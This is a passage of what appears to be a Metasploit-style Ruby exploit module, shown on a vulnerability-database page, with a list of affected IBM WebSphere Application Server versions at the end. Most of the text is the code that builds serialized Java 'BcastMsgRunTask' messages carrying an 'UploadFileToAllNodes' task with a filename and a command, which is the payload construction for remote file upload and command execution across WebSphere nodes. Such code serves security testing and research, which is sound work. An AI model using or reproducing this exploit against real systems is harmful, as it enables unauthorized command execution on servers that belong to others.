object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
object.class_desc.description = msg_class_desc
object.class_data << byte_array
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename)
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd)
object
end
def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj)
msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
# Create the integer field and add the reference
out_int_field = Rex::Java::Serialization::Model::Field.new
out_int_field.type = 'int'
out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval')
# Create the task object field and add field_type
task_field = Rex::Java::Serialization::Model::Field.new
task_field.type = 'object'
task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task')
task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
# Create the task object field and add field_type
task_arg_field = Rex::Java::Serialization::Model::Field.new
task_arg_field.type = 'object'
task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument')
task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;")
# Create the integer field and add the reference
forward_gather_field = Rex::Java::Serialization::Model::Field.new
forward_gather_field.type = 'int'
forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod')
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << forward_gather_field
msg_class_desc.fields << out_int_field
msg_class_desc.fields << task_field
msg_class_desc.fields << task_arg_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Set the member values
obj.class_data << ['int', 0]
obj.class_data << ['int', 1]
obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes')
obj.class_data << upfile_arg_obj
msg_class_desc
end
end
Products Mentioned
Configuraton 0
Ibm>>Websphere_application_server >> Version From (including) 8.5.0.0 To (including) 8.5.5.15
Ibm>>Websphere_application_server >> Version From (including) 9.0.0.0 To (including) 9.0.0.11
Ibm>>Websphere_application_server >> Version 7.0.0.0
References